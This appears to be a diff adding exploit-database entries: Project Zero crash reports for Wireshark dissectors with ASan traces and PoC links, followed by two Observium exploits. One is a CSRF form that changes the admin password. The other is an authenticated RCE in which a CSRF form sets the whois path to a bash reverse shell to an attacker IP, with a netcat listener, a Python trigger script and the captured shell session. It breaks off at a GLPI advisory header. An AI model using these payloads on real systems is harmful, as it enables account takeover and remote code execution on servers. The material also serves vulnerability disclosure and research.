 =>0x10006dd35340: 02 f2 04 f2 00 00 00 00 f2 f2 f2 f2 00[f2]f2 f2
  0x10006dd35350: 02 f2 04 f3 00 00 00 00 00 00 00 00 00 00 00 00
  0x10006dd35360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10006dd35370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10006dd35380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10006dd35390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==27389==ABORTING
 --- cut ---
 The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12351. Attached are three files which trigger the crash.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39748.zip
--- a/platforms/multiple/dos/39749.txt
+++ b/platforms/multiple/dos/39749.txt
@ -0,0 +1,110 @@
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=804
 The following crash due to an asserion failure can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
 --- cut ---
 ERROR:./address.h:144:alloc_address_wmem: assertion failed: (addr_data == NULL)
 Program received signal SIGABRT, Aborted.
 0x00007fffe13f5cc9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
 56      ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
 (gdb) where
 #0  0x00007fffe13f5cc9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
 #1  0x00007fffe13f90d8 in __GI_abort () at abort.c:89
 #2  0x00007fffe2e8c165 in g_assertion_message () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
 #3  0x00007fffe2e8c1fa in g_assertion_message_expr () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
 #4  0x00007fffeabea578 in alloc_address_wmem (scope=0x60700000c110, addr=0x7ffe9039af00, addr_type=22, 
    addr_len=0, addr_data=0x7ffe9039acb0) at ./address.h:144
 #5  0x00007fffeabe3454 in copy_address_wmem (scope=0x60700000c110, to=0x7ffe9039af00, from=0x7ffe9039a920)
    at ./address.h:254
 #6  0x00007fffeabe2ec7 in conversation_new (setup_frame=10, addr1=0x7ffe9039a8e8, addr2=0x7ffe9039a920, 
    ptype=PT_NONE, port1=0, port2=0, options=2) at conversation.c:701
 #7  0x00007fffebfe61a8 in get_peer_conversation (pinfo=0x61400000f058, tpt_conv_data=0x7ffe9039a8c0, create=1)
    at packet-jxta.c:800
 #8  0x00007fffebfda23d in dissect_jxta_stream (tvb=0x61d0001a6000, pinfo=0x61400000f058, tree=0x6190001500a0, 
    data=0x7fffffff5f30) at packet-jxta.c:682
 #9  0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91c302a0, tvb=0x61d0001a6000, 
    pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffff5f30) at packet.c:656
 #10 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91c302a0, tvb=0x61d0001a6000, 
    pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7fffffff5f30) at packet.c:731
 #11 0x00007fffeac5ea1f in call_dissector_only (handle=0x7ffe91c302a0, tvb=0x61d0001a6000, pinfo=0x61400000f058, 
    tree=0x6190001500a0, data=0x7fffffff5f30) at packet.c:2764
 #12 0x00007fffeabe9336 in try_conversation_dissector (addr_a=0x61400000f118, addr_b=0x61400000f130, 
    ptype=PT_TCP, port_a=32925, port_b=9711, tvb=0x61d0001a6000, pinfo=0x61400000f058, tree=0x6190001500a0, 
    data=0x7fffffff5f30) at conversation.c:1323
 #13 0x00007fffecd90b6b in decode_tcp_ports (tvb=0x61d0001a6ed0, offset=32, pinfo=0x61400000f058, 
    tree=0x6190001500a0, src_port=32925, dst_port=9711, tcpd=0x7ffe9039a3c0, tcpinfo=0x7fffffff5f30)
    at packet-tcp.c:4981
 #14 0x00007fffecd96f1b in process_tcp_payload (tvb=0x61d0001a6ed0, offset=32, pinfo=0x61400000f058, 
    tree=0x6190001500a0, tcp_tree=0x7ffe901993c0, src_port=32925, dst_port=9711, seq=145, nxtseq=3338, 
    is_tcp_segment=1, tcpd=0x7ffe9039a3c0, tcpinfo=0x7fffffff5f30) at packet-tcp.c:5085
 #15 0x00007fffecd91fcc in dissect_tcp_payload (tvb=0x61d0001a6ed0, pinfo=0x61400000f058, offset=32, seq=145, 
    nxtseq=3338, sport=32925, dport=9711, tree=0x6190001500a0, tcp_tree=0x7ffe901993c0, tcpd=0x7ffe9039a3c0, 
    tcpinfo=0x7fffffff5f30) at packet-tcp.c:5166
 #16 0x00007fffecda8229 in dissect_tcp (tvb=0x61d0001a6ed0, pinfo=0x61400000f058, tree=0x6190001500a0, 
    data=0x7ffe8ff93880) at packet-tcp.c:6071
 #17 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91c61460, tvb=0x61d0001a6ed0, 
    pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7ffe8ff93880) at packet.c:656
 #18 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91c61460, tvb=0x61d0001a6ed0, 
    pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7ffe8ff93880) at packet.c:731
 #19 0x00007fffeac53d4e in dissector_try_uint_new (sub_dissectors=0x61d000093c40, uint_val=6, tvb=0x61d0001a6ed0, 
    pinfo=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7ffe8ff93880) at packet.c:1190
 #20 0x00007fffebe8733c in ip_try_dissect (heur_first=0, tvb=0x61d0001a6ed0, pinfo=0x61400000f058, 
    tree=0x6190001500a0, iph=0x7ffe8ff93880) at packet-ip.c:1977
 #21 0x00007fffebe9214a in dissect_ip_v4 (tvb=0x61d0001a6140, pinfo=0x61400000f058, parent_tree=0x6190001500a0, 
    data=0x0) at packet-ip.c:2476
 #22 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91d022f0, tvb=0x61d0001a6140, 
    pinfo=0x61400000f058, tree=0x6190001500a0, data=0x0) at packet.c:656
 #23 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91d022f0, tvb=0x61d0001a6140, 
    pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x0) at packet.c:731
 #24 0x00007fffeac53d4e in dissector_try_uint_new (sub_dissectors=0x61d000052380, uint_val=2048, 
    tvb=0x61d0001a6140, pinfo=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x0) at packet.c:1190
 #25 0x00007fffeac548f5 in dissector_try_uint (sub_dissectors=0x61d000052380, uint_val=2048, tvb=0x61d0001a6140, 
    pinfo=0x61400000f058, tree=0x6190001500a0) at packet.c:1216
 #26 0x00007fffeb97476a in dissect_ethertype (tvb=0x61d0001a74c0, pinfo=0x61400000f058, tree=0x6190001500a0, 
    data=0x7fffffffa080) at packet-ethertype.c:257
 #27 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91ba4860, tvb=0x61d0001a74c0, 
    pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffffa080) at packet.c:656
 #28 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91ba4860, tvb=0x61d0001a74c0, 
    pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7fffffffa080) at packet.c:731
 #29 0x00007fffeac5ea1f in call_dissector_only (handle=0x7ffe91ba4860, tvb=0x61d0001a74c0, pinfo=0x61400000f058, 
    tree=0x6190001500a0, data=0x7fffffffa080) at packet.c:2764
 #30 0x00007fffeac4f900 in call_dissector_with_data (handle=0x7ffe91ba4860, tvb=0x61d0001a74c0, 
    pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffffa080) at packet.c:2777
 #31 0x00007fffecb24cac in dissect_sll (tvb=0x61d0001a74c0, pinfo=0x61400000f058, tree=0x6190001500a0, 
 ---Type <return> to continue, or q <return> to quit---
    data=0x61300000df08) at packet-sll.c:291
 #32 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91c5e810, tvb=0x61d0001a74c0, 
    pinfo=0x61400000f058, tree=0x6190001500a0, data=0x61300000df08) at packet.c:656
 #33 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91c5e810, tvb=0x61d0001a74c0, 
    pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x61300000df08) at packet.c:731
 #34 0x00007fffeac53d4e in dissector_try_uint_new (sub_dissectors=0x61d000051a40, uint_val=25, 
    tvb=0x61d0001a74c0, pinfo=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x61300000df08)
    at packet.c:1190
 #35 0x00007fffeba65106 in dissect_frame (tvb=0x61d0001a74c0, pinfo=0x61400000f058, parent_tree=0x6190001500a0, 
    data=0x7fffffffc560) at packet-frame.c:492
 #36 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91ba61b0, tvb=0x61d0001a74c0, 
    pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffffc560) at packet.c:656
 #37 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91ba61b0, tvb=0x61d0001a74c0, 
    pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7fffffffc560) at packet.c:731
 #38 0x00007fffeac5ea1f in call_dissector_only (handle=0x7ffe91ba61b0, tvb=0x61d0001a74c0, pinfo=0x61400000f058, 
    tree=0x6190001500a0, data=0x7fffffffc560) at packet.c:2764
 #39 0x00007fffeac4f900 in call_dissector_with_data (handle=0x7ffe91ba61b0, tvb=0x61d0001a74c0, 
    pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffffc560) at packet.c:2777
 #40 0x00007fffeac4ecd5 in dissect_record (edt=0x61400000f040, file_type_subtype=1, phdr=0x61300000dea0, 
    tvb=0x61d0001a74c0, fd=0x7fffffffc8a0, cinfo=0x0) at packet.c:539
 #41 0x00007fffeac01dba in epan_dissect_run_with_taps (edt=0x61400000f040, file_type_subtype=1, 
    phdr=0x61300000dea0, tvb=0x61d0001a74c0, fd=0x7fffffffc8a0, cinfo=0x0) at epan.c:376
 #42 0x000000000052ef40 in process_packet (cf=0x14b82e0 <cfile>, edt=0x61400000f040, offset=2804, 
    whdr=0x61300000dea0, pd=0x6210000fb500 "\300", tap_flags=0) at tshark.c:3727
 #43 0x000000000052830d in load_cap_file (cf=0x14b82e0 <cfile>, save_file=0x0, out_file_type=2, 
    out_file_name_res=0, max_packet_count=-9, max_byte_count=0) at tshark.c:3483
 #44 0x000000000051e67d in main (argc=3, argv=0x7fffffffe268) at tshark.c:2192
 --- cut ---
 The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12354. Attached are two files which trigger the crash.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39749.zip
--- a/platforms/multiple/dos/39750.txt
+++ b/platforms/multiple/dos/39750.txt
@ -0,0 +1,176 @@
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=806
 The following crashes due to a static out-of-bounds memory read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
 --- cut ---
 ==666==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fa5e68bd620 at pc 0x7fa5dc525eab bp 0x7ffd5938ec40 sp 0x7ffd5938ec38
 READ of size 4 at 0x7fa5e68bd620 thread T0
    #0 0x7fa5dc525eaa in dissect_zcl_pwr_prof_pwrprofnotif wireshark/epan/dissectors/packet-zbee-zcl-general.c:10832:25
    #1 0x7fa5dc512afc in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:10549:21
    #2 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
    #3 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
    #4 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
    #5 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
    #6 0x7fa5dc4f777c in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:881:13
    #7 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
    #8 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
    #9 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
    #10 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
    #11 0x7fa5dc4d0d60 in dissect_zbee_apf wireshark/epan/dissectors/packet-zbee-aps.c:1705:9
    #12 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
    #13 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
    #14 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
    #15 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
    #16 0x7fa5dc4d04fa in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1055:13
    #17 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
    #18 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
    #19 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
    #20 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
    #21 0x7fa5dc4da910 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:732:9
    #22 0x7fa5dc4d419a in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:762:9
    #23 0x7fa5dc4d5fb7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:409:5
    #24 0x7fa5d9d83bbb in dissector_try_heuristic wireshark/epan/packet.c:2390:7
    #25 0x7fa5daf6591b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1524:21
    #26 0x7fa5daf5756a in dissect_ieee802154_nofcs wireshark/epan/dissectors/packet-ieee802154.c:751:5
    #27 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
    #28 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
    #29 0x7fa5d9d7ad4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
    #30 0x7fa5dab8c105 in dissect_frame wireshark/epan/dissectors/packet-frame.c:492:11
    #31 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
    #32 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
    #33 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
    #34 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
    #35 0x7fa5d9d75cd4 in dissect_record wireshark/epan/packet.c:539:3
    #36 0x7fa5d9d28db9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
    #37 0x52ef3f in process_packet wireshark/tshark.c:3727:5
    #38 0x52830c in load_cap_file wireshark/tshark.c:3483:11
    #39 0x51e67c in main wireshark/tshark.c:2192:13
 0x7fa5e68bd620 is located 32 bytes to the left of global variable 'ett_zbee_zcl_appl_ctrl_func' defined in 'packet-zbee-zcl-general.c:11520:13' (0x7fa5e68bd640) of size 128
 0x7fa5e68bd620 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:10389:13' (0x7fa5e68bd5e0) of size 64
 SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:10832:25 in dissect_zcl_pwr_prof_pwrprofnotif
 Shadow bytes around the buggy address:
  0x0ff53cd0fa70: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
  0x0ff53cd0fa80: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
  0x0ff53cd0fa90: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff53cd0faa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
  0x0ff53cd0fab0: f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9 00 00 00 00
 =>0x0ff53cd0fac0: 00 00 00 00[f9]f9 f9 f9 00 00 00 00 00 00 00 00
  0x0ff53cd0fad0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9
  0x0ff53cd0fae0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff53cd0faf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff53cd0fb00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff53cd0fb10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==666==ABORTING
 --- cut ---
 --- cut ---
 ==695==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7feb11013620 at pc 0x7feb06c7b825 bp 0x7ffd6fe96b00 sp 0x7ffd6fe96af8
 READ of size 4 at 0x7feb11013620 thread T0
    #0 0x7feb06c7b824 in dissect_zcl_pwr_prof_enphsschednotif wireshark/epan/dissectors/packet-zbee-zcl-general.c:10745:25
    #1 0x7feb06c68ba8 in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:10563:21
    #2 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
    #3 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
    #4 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
    #5 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
    #6 0x7feb06c4d77c in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:881:13
    #7 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
    #8 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
    #9 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
    #10 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
    #11 0x7feb06c26d60 in dissect_zbee_apf wireshark/epan/dissectors/packet-zbee-aps.c:1705:9
    #12 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
    #13 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
    #14 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
    #15 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
    #16 0x7feb06c264fa in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1055:13
    #17 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
    #18 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
    #19 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
    #20 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
    #21 0x7feb06c30910 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:732:9
    #22 0x7feb06c2a19a in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:762:9
    #23 0x7feb06c2bfb7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:409:5
    #24 0x7feb044d9bbb in dissector_try_heuristic wireshark/epan/packet.c:2390:7
    #25 0x7feb056bb91b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1524:21
    #26 0x7feb056ad56a in dissect_ieee802154_nofcs wireshark/epan/dissectors/packet-ieee802154.c:751:5
    #27 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
    #28 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
    #29 0x7feb044d0d4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
    #30 0x7feb052e2105 in dissect_frame wireshark/epan/dissectors/packet-frame.c:492:11
    #31 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
    #32 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
    #33 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
    #34 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
    #35 0x7feb044cbcd4 in dissect_record wireshark/epan/packet.c:539:3
    #36 0x7feb0447edb9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
    #37 0x52ef3f in process_packet wireshark/tshark.c:3727:5
    #38 0x52830c in load_cap_file wireshark/tshark.c:3483:11
    #39 0x51e67c in main wireshark/tshark.c:2192:13
 0x7feb11013620 is located 32 bytes to the left of global variable 'ett_zbee_zcl_appl_ctrl_func' defined in 'packet-zbee-zcl-general.c:11520:13' (0x7feb11013640) of size 128
 0x7feb11013620 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:10389:13' (0x7feb110135e0) of size 64
 SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:10745:25 in dissect_zcl_pwr_prof_enphsschednotif
 Shadow bytes around the buggy address:
  0x0ffde21fa670: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
  0x0ffde21fa680: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
  0x0ffde21fa690: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffde21fa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
  0x0ffde21fa6b0: f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9 00 00 00 00
 =>0x0ffde21fa6c0: 00 00 00 00[f9]f9 f9 f9 00 00 00 00 00 00 00 00
  0x0ffde21fa6d0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9
  0x0ffde21fa6e0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffde21fa6f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffde21fa700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffde21fa710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==695==ABORTING
 --- cut ---
 The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12358. Attached are two files which trigger the crash.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39750.zip
--- a/platforms/php/webapps/39744.html
+++ b/platforms/php/webapps/39744.html
@ -0,0 +1,36 @@
 <!--
 # Exploit title: Observium Commercial - CSRF
 # Author: Dolev Farhi
 # Contact: dolevf at protonmail.com
 # Date: 28-04-2016
 # Vendor homepage: http://observium.org/
 # Software version: CE 0.16.7533
 # Details:
 Observium is a low-maintenance auto-discovering network monitoring platform supporting a wide range of device types, platforms and operating systems including Cisco, Windows, Linux, HP, Juniper, Dell, FreeBSD, Brocade, Netscaler, NetApp and many more. Observium focuses on providing a beautiful and powerful yet simple and intuitive interface to the health and status of your network.
 CSRF details
 due to lack of csrf protection, it is possible to create an additional administrator user, or change the current administrator password since it does not ask for the previous password before changing it. 
 i.e. New password <Enter new pass> & retype password <Enter new pass>
 instead of having to insert the older password.
 such an attack would look like this:
 -->
 <html>
 <div align="center">
 <pre>
 <h2><b>Change admin password<b></h2>
 <body>
 <form
 action="http://observiumIP/edituser/user_id=1/"
 method="POST">
 <input type="hidden" name="action" value="changepass" />
 <input type="hidden" name="new_pass" value="test123" />
 <input type="hidden" name="new_pass2" value="test123" />
 <input type="submit" name="submit" value="save" />
    </form>
    </body>
 </div>
 </html>
--- a/platforms/php/webapps/39745.txt
+++ b/platforms/php/webapps/39745.txt
@ -0,0 +1,108 @@
 # Exploit title: Observium Commercial - Authenticated RCE
 # Author: Dolev Farhi
 # Contact: dolevf at protonmail.com
 # Date: 28-04-2016
 # Vendor homepage: http://observium.org/
 # Software version: CE 0.16.7533
 Authenticated remote code execution
 Using either CSRF or by editing the whois binary field in the Observium webui under Settings-> System Path, an attacker may also change the Path to either [whois, mtr, nmap] to any bash command, and by hitting the url: http://<ObserviumIP>/netcmd.php?cmd=whois&query=8.8.8.8
 using any user on Observium (even low privileged) we can trigger a code execution. for example. setting up a listener
 root@pt:~# nc -lvp 4444
 listening on [any] 4444 ...
 and a CSRF which looks like this:
 <!-- 
 <html>
 <div align="center">
 <pre>
 <h2><b>CSRF<b></h2>
 <body>
 <form
 action="http://<observiumIP>/settings/section=paths/"
 method="POST">
 <input type="hidden" name="temp_dir" value="" />
 <input type="hidden" name="varset_temp_dir" value="" />
 <input type="hidden" name="varset_rrdtool" value="" />
 <input type="hidden" name="fping" value="" />
 <input type="hidden" name="varset_fping" value="" />
 <input type="hidden" name="fping6" value="" />
 <input type="hidden" name="varset_fping6" value="" />
 <input type="hidden" name="svn" value="" />
 <input type="hidden" name="varset_svn" value="" />
 <input type="hidden" name="snmpget" value="" />
 <input type="hidden" name="varset_snmpget" value="" />
 <input type="hidden" name="snmpwalk" value="" />
 <input type="hidden" name="varset_snmpwalk" value="" />
 <input type="hidden" name="snmpbulkget" value="" />
 <input type="hidden" name="varset_snmpbulkget" value="" />
 <input type="hidden" name="snmpbulkwalk" value="" />
 <input type="hidden" name="varset_snmpbulkwalk" value="" />
 <input type="hidden" name="snmptranslate" value="" />
 <input type="hidden" name="varset_snmptranslate" value="" />
 <input type="hidden" name="ipmitool" value="" />
 <input type="hidden" name="varset_ipmitool" value="" />
 <input type="hidden" name="virsh" value="" />
 <input type="hidden" name="varset_virsh" value="" />
 <input type="hidden" name="wmic" value="" />
 <input type="hidden" name="varset_wmic" value="" />
 <input type="hidden" name="git" value="" />
 <input type="hidden" name="varset_git" value="" />
 <input type="hidden" name="whois" value="bash -i >& /dev/tcp/192.168.2.222/4444 0>&1; exit" />
 <input type="hidden" name="varset_whois" value="" />
 <input type="hidden" name="whois_custom" value="1" />
 <input type="hidden" name="file" value="" />
 <input type="hidden" name="varset_file" value="" />
 <input type="hidden" name="dot" value="" />
 <input type="hidden" name="varset_dot" value="" />
 <input type="submit" name="submit" value="save" />
    </form>
    </body>
 </div>
 </html>
 or by changing the field of Path to 'whois' binary to 'bash -i >& /dev/tcp/attackerip/4444 0>&1; exit'  and then visiting http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8, we trigger the code that is defined in the 
 whois parameter which gives us a reverse shell on the machine:
 you may also use the following python instead:
 """
 import sys
 import urllib
 import urllib2
 import cookielib
 #!/usr/bin/python 
 username = 'test'
 password = '123456'
 timeout = 10
 try:
    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    login_data = urllib.urlencode({'username' : username, 'password' : password, 'submit' : ''})
    opener.open('http://observium-server', login_data, timeout=timeout)
    url = 'http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8'
    resp = opener.open(url)
 except Exception, e:
    print e
    sys.exit(1)
 """
 listening on [any] 4444 ...
 192.168.2.155: inverse host lookup failed: Unknown host
 connect to [192.168.2.222] from (UNKNOWN) [192.168.2.155] 52413
 bash: no job control in this shell
 bash: /root/.bashrc: Permission denied
 bash-4.1$ ls -l /opt
 ls -l /opt
 total 48944
 drwxrwxr-x  12 1000 1000     4096 Apr 27 13:47 observium
 -rw-r--r--   1 root root 50107191 Jan 27 07:35 observium-community-latest.tar.gz
 drwxr-xr-x.  2 root root     4096 Mar 26  2015 rh
--- a/platforms/php/webapps/39751.txt
+++ b/platforms/php/webapps/39751.txt
@ -0,0 +1,57 @@
 Advisory ID: HTB23301
 Product: GLPI
 Vendor: INDEPNET 
 Vulnerable Version(s): 0.90.2 and probably prior
 Tested Version: 0.90.2
 Advisory Publication: April 8, 2016 [without technical details]
 Vendor Notification: April 8, 2016 
 Vendor Patch: April 11, 2016 
 Public Disclosure: April 29, 2016 
